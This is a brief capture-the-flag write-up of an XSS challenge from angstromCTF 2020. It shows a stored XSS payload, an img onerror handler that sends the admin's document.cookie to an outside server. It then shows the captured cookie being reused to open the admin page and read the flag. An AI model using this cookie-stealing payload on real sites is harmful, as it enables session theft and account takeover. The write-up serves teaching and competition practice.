# ▼▼▼Xmas Still Stands(Web、50pts、464/1596=29.1％)▼▼▼
## ※XSS basic problem

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

```
POST /post HTTP/1.1
Host: xmas.2020.chall.actf.co
Content-Type: application/x-www-form-urlencoded

content=<img+src=X+onerror="location=`https://my_server/`+document.cookie" >
```

↓　Contacting admin with id gives access to my_server from admin

```
GET /inspect/01e3c539tf42w5hje1vehjjhk1/super_secret_admin_cookie=hello_yes_i_am_admin;%20admin_name=John HTTP/1.1
requestinspector.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US
User-Agent: John's browser
Referer: http://127.0.0.1:3000/posts/933
Accept-Encoding: gzip
```
↓

The following admin cookie was obtained

`super_secret_admin_cookie=hello_yes_i_am_admin; admin_name=John`

↓　The following admin cookie was obtained

↓

```
GET /admin HTTP/1.1
Host: xmas.2020.chall.actf.co
Cookie: super_secret_admin_cookie=hello_yes_i_am_admin;admin_name=John
```
↓

`flag is actf{s4n1tize_y0ur_html_4nd_y0ur_h4nds}`